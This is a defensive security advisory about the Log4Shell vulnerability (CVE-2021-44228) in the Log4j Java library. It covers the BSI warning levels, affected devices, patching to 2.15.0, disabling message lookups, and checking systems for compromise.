critical vulnerability in Java logging library Log4j

On November 24th a critical vulnerability (zero-day vulnerability) in Log4j was reported to Apache. It was later (10th December) made public under the name Log4Shell (CVE-2021-44228); it can be exploited effortlessly remotely and allows an attacker to execute his own code (RCE). Among others, Amazon, Apple, Tesla, Twitter, Steam, etc. were successfully attacked. Due to the ease of exploitation and severe consequences, the BSI has already issued the highest warning level “red” Saturday the 11th of December. The warning level (2021-549177-1232) was lowered to yellow after 32 days on Jan. 12, 2022, because the situation has eased significantly, according to the BSI, and a large number of software vendors have now released patches or workarounds for their products – but not all of them.

These risks and safeguards apply also to PC, notebooks, tablets or smart phones – generally hundreds of millions IT-and IoT-devices – if a software like Minecraft with a covert server is installed with the Java library log4j e.g. in Java web cams, car navigation systems, and set-top boxes, Kitchen appliances, white goods, and even parking meters, smart meter gateways and medical devices.

Are you affected?

To check if your servers are vulnerable, feel free to use our script.

Log4j before version 2.15.0 (December 6, 2021) is affected. Some products that include Log4j are also vulnerable. A constantly updated list of these can be found here.

What should you do if you are affected?

  • Patching: Update Log4j to version 2.15.0 (or later) or update the products that use Log4j.
  • Mitigate: If patching is not possible, the vulnerability can be mitigated by disabling the logging of lookups. To do this, set “log4j2.formatMsgNoLookups” or the environment variable “LOG4J_FORMAT_MSG_NO_LOOKUPS” to “true”.
  • You were successfully attacked? Check whether the vulnerability has already been exploited. The log4shell-detector tool helps with this. If you were successfully attacked, the entire system must be forensically examined; critical systems must be taken offline.